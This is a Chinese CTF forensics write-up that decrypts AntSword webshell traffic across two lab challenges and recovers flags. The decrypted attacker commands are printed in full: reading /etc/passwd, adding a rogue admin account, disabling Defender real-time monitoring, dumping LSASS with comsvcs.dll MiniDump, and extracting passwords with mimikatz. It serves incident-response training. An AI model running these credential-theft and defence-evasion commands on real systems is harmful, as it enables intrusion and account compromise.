第六章 流量特征分析-蚁剑流量分析
flag1 : ⽊⻢的连接密码是什么
flag2 : ⿊客执⾏的第⼀个命令是什么
flag3 : ⿊客读取了哪个⽂件的内容,提交⽂件绝对路径
flag4 : ⿊客上传了什么⽂件到服务器,提交⽂件名
flag5 : ⿊客上传的⽂件内容是什么
flag6 : ⿊客下载了哪个⽂件,提交⽂件绝对路径
在正式做题之前,我们先对蚁剑的流量进⾏解密:
cd "/var/www/html";id;echo e124bc;pwd;echo 43523
cd "/var/www/html";ls;echo e124bc;pwd;echo 43523
cd "/var/www/html";cat /etc/passwd;echo e124bc;pwd;echo 43523 .
/var/www/html/flag.txt .
/var/www/html/7
/var/www/html/config.php
flag1:⽊⻢的连接密码是什么 我们随便找个数据包,查看连接密码:
flag2:⿊客执⾏的第⼀个命令是什么 将第⼀个数据包中的特定字段,从第⼆位索引开始 base64 解密:
flag3:⿊客读取了哪个⽂件的内容,提交⽂件绝对路径 在上⾯我们解密的流量中,可以看到 cat /etc/passwd 这个读取⽂件的命令。追踪流,验证是否读取成功:
flag4:⿊客⻓传了什么⽂件到服务器,提交⽂件名 蚁剑上传⽂件到服务器,默认对⽂件内容进⾏⼗六进制编码,找到对应的数据包:
flag5:⿊客上传的⽂件内容是什么 对上⾯的内容进⾏⼗六进制解码即可:
flag{write_flag}
flag6:⿊客下载了哪个⽂件,提交⽂件绝对路径 在上⾯的解密后的数据中,只有最后两个最可疑,观察,两个请求包及返回包:
flag{/var/www/html/config.php}
总结:此靶机考察对蚁剑流量的解密,对蚁剑默认未编码的流量有⼀定的认知。
第六章 流量特征分析-蚂蚁爱上树
在此之前,先对蚁剑流量进⾏解密:
cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&ls&echo [S]&cd&echo [E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir&echo [S]&cd&echo [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&whoami&echo [S]&cd&echo [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&whoami /priv&echo [S]&cd&ec
ho [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&systeminfo&echo [S]&cd&ech
o [E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:&echo [S]&cd&echo
[E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:temp&echo [S]&cd&ech
o [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net user&echo [S]&cd&echo
[E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net localgroup administrato
rs&echo [S]&cd&echo [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net group "domain group" /d
omain&echo [S]&cd&echo [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net group "domain admins" /
domain&echo [S]&cd&echo [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net view&echo [S]&cd&echo
[E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net share&echo [S]&cd&echo
[E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&rundll32.exe comsvcs.dll, M
iniDump 852 C:TempOnlineShopBackup.zip full&echo [S]&cd&echo [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:temp&echo [S]&cd&ech
o [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:temp&echo [S]&cd&ech
o [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"© store.php c:temp&ech
o [S]&cd&echo [E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:temp&echo [S]&cd&ech
o [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&powershell -ep bypass Set-M
ppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&powershell -ep bypass Set-M
ppreference -DisableRealtimeMonitoring $true&echo [S]&cd&echo [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&powershell -ep bypass Get-M
pComputerStatus&echo [S]&cd&echo [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&rundll32.exe comsvcs.dll, M
iniDump 852 C:tempOnlineShopBackup.zip full&echo [S]&cd&echo [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:temp&echo [S]&cd&ech
o [E]7
cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&dir c:windowssystem32&echo
[S]&cd&echo [E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:windowsconfig&echo
[S]&cd&echo [E]
7
flag1:管理员Admin账号的密码是多少
从解密数据中,得到管理员Admin的密码:
flag2:LSASS.exe的程序进程ID是多少
我们寻找下载这个进程的数据包:
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net user&echo [S]&cd&echo
[E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net user admin Password1 /a
dd&echo [S]&cd&echo [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net localgroup administrato
rs admin /add&echo [S]&cd&echo [E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net user&echo [S]&cd&echo
[E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net localgroup administrato
rs&echo [S]&cd&echo [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&whoami /all&echo [S]&cd&ech
o [E]7
flag1:管理员Admin账号的密码是多少 从解密数据中,得到管理员Admin的密码:
flag{Password1}
flag2:LSASS.exe的程序进程ID是多少 我们寻找下载这个进程的数据包:
flag{852}
注:leass.exe进程空间中,存有着机器的域、本地⽤户名和密码等重要信息。
flag3:⽤户WIN0101的密码是多少 我们将HTTP对象全部导出,降序排列找到最⼤的⽂件:
从⽂件头我们可以判断此⽂件是dmp⽂件,不过要去除多余的⽂件头 e1c1709 ,后缀改为 dmp 。
⽤mimikatz导出dmp⽂件中存储的⽤户数据:
sekurlsa::minidump pathtoproduct2(120).dmp
sekurlsa::logonpasswords
在线解密得到密码:https://www.somd5.com/
flag{admin#123}
总结:此靶机考察了蚁剑流量解密,以及leass.exe进程下载及⽤户数据提取、解密。
作者 船山院士团队成员 sw0rd
原文始发于微信公众号(船山信安):玄机 流量分析篇
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论